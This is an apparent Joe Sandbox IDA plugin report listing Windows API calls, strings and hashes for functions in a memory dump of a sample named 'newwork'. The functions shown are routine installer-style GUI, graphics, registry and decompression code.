                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                        • String ID: ,$?
                                                                                        • API String ID: 2359071979-2308483597
                                                                                        • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                        • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                        • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                        APIs
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                        • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                        • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                        • String ID:
                                                                                        • API String ID: 1030595962-0
                                                                                        • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                        • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                        • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                        APIs
                                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                        • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                        • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                        • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                        • String ID:
                                                                                        • API String ID: 2222416421-0
                                                                                        • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                        • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                        • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                          • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                        • TranslateMessage.USER32(?), ref: 004573B3
                                                                                        • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                        • String ID: [Paused]
                                                                                        • API String ID: 1007367021-4230553315
                                                                                        • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                        • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                        • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                        APIs
                                                                                        • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                        • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                        • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LoadSleep
                                                                                        • String ID: CheckPassword
                                                                                        • API String ID: 4023313301-1302249611
                                                                                        • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                        • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                        • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                        APIs
                                                                                          • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                          • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                          • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                        • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                        • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                        Strings
                                                                                        • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                        • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                        • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                        • API String ID: 613034392-3771334282
                                                                                        • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                        • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                        • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                        Strings
                                                                                        • Fusion.dll, xrefs: 004597DF
                                                                                        • CreateAssemblyCache, xrefs: 00459836
                                                                                        • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                        • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                        • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                        • API String ID: 190572456-3990135632
                                                                                        • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                        • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                        • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                        APIs
                                                                                          • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                        • GetFocus.USER32 ref: 0041C168
                                                                                        • GetDC.USER32(?), ref: 0041C174
                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                        • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3303097818-0
                                                                                        • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                        • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                        • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                        • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                        • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                          • Part of subcall function 004107F8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                        • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                        • 6F530860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$C400C740F530860F532980
                                                                                        • String ID:
                                                                                        • API String ID: 209721339-0
                                                                                        • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                        • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                        • API String ID: 47109696-2530820420
                                                                                        • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                        • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                        APIs
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$Delete$Stretch
                                                                                        • String ID:
                                                                                        • API String ID: 1458357782-0
                                                                                        • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                        • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00495519
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                        • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                        Strings
                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                        • API String ID: 2948443157-222967699
                                                                                        • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                        • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 004233AF
                                                                                        • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                        • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                        • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                        • SetCursor.USER32(00000000), ref: 00423413
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1770779139-0
                                                                                        • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                        • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                        • API String ID: 667068680-2254406584
                                                                                        • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                        • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                        • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                        • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                        • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                        • API String ID: 190572456-212574377
                                                                                        • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                        • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                        • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                        • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                          • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                          • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
